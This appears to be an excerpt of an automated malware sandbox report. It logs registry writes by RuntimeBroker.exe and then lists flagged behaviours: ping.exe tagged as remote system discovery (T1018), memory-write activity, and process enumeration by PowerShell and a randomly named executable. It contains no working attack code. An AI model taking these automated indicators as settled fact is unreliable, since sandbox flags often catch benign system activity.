Set value (data)	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cc75f4c2-7d39-4f64-96 = 02eba8584cf8d901	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cc75f4c2-7d39-4f64-96 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4f29dbc4-c8ea-461d-9e = "8324"	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5a0fa20e-2791-4377-b3	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7035e6bf-fe2d-4547-a1 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6df044db-516c-4b41-92 = "\\\\?\\Volume{692520D5-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\c2c51b78ed3cd3f236ce2aa8c0df91aed14d3768c9123140b7514ca31bb99b47"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\209e16ac-990d-425d-88 = d3ffb4584cf8d901	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f947bb2c-b31c-4319-87 = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000ea2ab7584cf8d901ea2ab7584cf8d901ea2ab7584cf8d901000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad0132000000000046573d5f2000343964373134306565646165663134643464313134363361653339356463623532613734396261373834363335323261643137613433313965653363616131370000b20009000400efbe46573d5f46573d5f2e00000000000000000000000000000000000000000000000000167c5f00340039006400370031003400300065006500640061006500660031003400640034006400310031003400360033006100650033003900350064006300620035003200610037003400390062006100370038003400360033003500320032006100640031003700610034003300310039006500650033006300610061003100370000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000729bbfb01000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c34396437313430656564616566313464346431313436336165333935646362353261373439626137383436333532326164313761343331396565336361613137000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006f787771646b7376000000000000000082671612f74e484cb69989136ee22c0978c54f959b53ee11a4ad66f79730121682671612f74e484cb69989136ee22c0978c54f959b53ee11a4ad66f797301216ca000000090000a08500000031535053e28a5846bc4c3843bbfc139326986dce6900000004000000001f0000002c00000053002d0031002d0035002d00320031002d0032003300340034003600380038003000310033002d0032003900360035003400360038003700310037002d0032003000330034003100320036002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000d5202569000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b067e76e-81a5-44bb-a3	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cc75f4c2-7d39-4f64-96	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f947bb2c-b31c-4319-87 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\15a1826c-093f-49e0-ba = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000000fb4c0584cf8d9010fb4c0584cf8d9010fb4c0584cf8d901000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad0132000000000046573d5f2000366438613032316637343463613439663064373364653130623831333134646132373230356366633166323361313039316439643064653831313138626435610000b20009000400efbe46573d5f46573d5f2e00000000000000000000000000000000000000000000000000f1f25500360064003800610030003200310066003700340034006300610034003900660030006400370033006400650031003000620038003100330031003400640061003200370032003000350063006600630031006600320033006100310030003900310064003900640030006400650038003100310031003800620064003500610000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000729bbfb01000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c36643861303231663734346361343966306437336465313062383133313464613237323035636663316632336131303931643964306465383131313862643561000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006f787771646b7376000000000000000082671612f74e484cb69989136ee22c0979c54f959b53ee11a4ad66f79730121682671612f74e484cb69989136ee22c0979c54f959b53ee11a4ad66f797301216ca000000090000a08500000031535053e28a5846bc4c3843bbfc139326986dce6900000004000000001f0000002c00000053002d0031002d0035002d00320031002d0032003300340034003600380038003000310033002d0032003900360035003400360038003700310037002d0032003000330034003100320036002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000d5202569000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\87a3e9b3-5546-449d-8c = "8324"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\570401a0-a9bd-4df1-99 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4f29dbc4-c8ea-461d-9e = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4f29dbc4-c8ea-461d-9e = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000f3e856594cf8d901ae4978594cf8d901ae4978594cf8d901e30805000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad0132000000000046573d5f2000343964373134306565646165663134643464313134363361653339356463623532613734396261373834363335323261643137613433313965653363616131370000b20009000400efbe46573d5f46573d5f2e00000000000000000000000000000000000000000000000000167c5f00340039006400370031003400300065006500640061006500660031003400640034006400310031003400360033006100650033003900350064006300620035003200610037003400390062006100370038003400360033003500320032006100640031003700610034003300310039006500650033006300610061003100370000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000729bbfb01000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c34396437313430656564616566313464346431313436336165333935646362353261373439626137383436333532326164313761343331396565336361613137000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006f787771646b7376000000000000000082671612f74e484cb69989136ee22c0980c54f959b53ee11a4ad66f79730121682671612f74e484cb69989136ee22c0980c54f959b53ee11a4ad66f797301216ca000000090000a08500000031535053e28a5846bc4c3843bbfc139326986dce6900000004000000001f0000002c00000053002d0031002d0035002d00320031002d0032003300340034003600380038003000310033002d0032003900360035003400360038003700310037002d0032003000330034003100320036002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000d5202569000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b067e76e-81a5-44bb-a3 = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000029a0ad584cf8d90129a0ad584cf8d90129a0ad584cf8d901000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad0132000000000046573d5f2000643835656561373232303939343135653235666566393634616239313061373735303634333638306636343265383331346564373036363061313961303134310000b20009000400efbe46573d5f46573d5f2e00000000000000000000000000000000000000000000000000d7066900640038003500650065006100370032003200300039003900340031003500650032003500660065006600390036003400610062003900310030006100370037003500300036003400330036003800300066003600340032006500380033003100340065006400370030003600360030006100310039006100300031003400310000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000729bbfb01000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c64383565656137323230393934313565323566656639363461623931306137373530363433363830663634326538333134656437303636306131396130313431000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006f787771646b7376000000000000000082671612f74e484cb69989136ee22c0976c54f959b53ee11a4ad66f79730121682671612f74e484cb69989136ee22c0976c54f959b53ee11a4ad66f797301216ca000000090000a08500000031535053e28a5846bc4c3843bbfc139326986dce6900000004000000001f0000002c00000053002d0031002d0035002d00320031002d0032003300340034003600380038003000310033002d0032003900360035003400360038003700310037002d0032003000330034003100320036002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000d5202569000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\209e16ac-990d-425d-88 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\15a1826c-093f-49e0-ba = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7035e6bf-fe2d-4547-a1 = "0"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4877e610-3831-4aa8-9d = "8324"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6df044db-516c-4b41-92 = 5a305e5a4cf8d901	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b067e76e-81a5-44bb-a3	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5a0fa20e-2791-4377-b3	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5a0fa20e-2791-4377-b3 = "0"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f947bb2c-b31c-4319-87 = "8324"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7035e6bf-fe2d-4547-a1 = 9ff0e5594cf8d901	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6df044db-516c-4b41-92 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cc75f4c2-7d39-4f64-96 = "8324"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\87a3e9b3-5546-449d-8c = aea7d0594cf8d901	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\570401a0-a9bd-4df1-99 = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000be7541594cf8d9015c5e6c594cf8d9015c5e6c594cf8d90148ea02000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad0132000000000046573d5f2000303034373831643863623036666162343536323436366636636337666336666633373930363061613864336438303130613764333431613839356636656135640000b20009000400efbe46573d5f46573d5f2e0000000000000000000000000000000000000000000000000017f07400300030003400370038003100640038006300620030003600660061006200340035003600320034003600360066003600630063003700660063003600660066003300370039003000360030006100610038006400330064003800300031003000610037006400330034003100610038003900350066003600650061003500640000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000729bbfb01000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c30303437383164386362303666616234353632343636663663633766633666663337393036306161386433643830313061376433343161383935663665613564000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006f787771646b7376000000000000000082671612f74e484cb69989136ee22c097dc54f959b53ee11a4ad66f79730121682671612f74e484cb69989136ee22c097dc54f959b53ee11a4ad66f797301216ca000000090000a08500000031535053e28a5846bc4c3843bbfc139326986dce6900000004000000001f0000002c00000053002d0031002d0035002d00320031002d0032003300340034003600380038003000310033002d0032003900360035003400360038003700310037002d0032003000330034003100320036002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000d5202569000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7035e6bf-fe2d-4547-a1	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4f29dbc4-c8ea-461d-9e	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\87a3e9b3-5546-449d-8c	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4f29dbc4-c8ea-461d-9e = "\\\\?\\Volume{692520D5-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\49d7140eedaef14d4d11463ae395dcb52a749ba78463522ad17a4319ee3caa17"	RuntimeBroker.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

3976 PING.EXE
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

PING.EXE

pid process

3976 PING.EXE

pid	process
3976	PING.EXE

pid	process
3976	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exegPEkKBRh.exepowershell.exeExplorer.EXE

pid	process
3188	powershell.exe
3188	powershell.exe
1108	gPEkKBRh.exe
1108	gPEkKBRh.exe
4884	powershell.exe
4884	powershell.exe
4884	powershell.exe
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
3260	Explorer.EXE
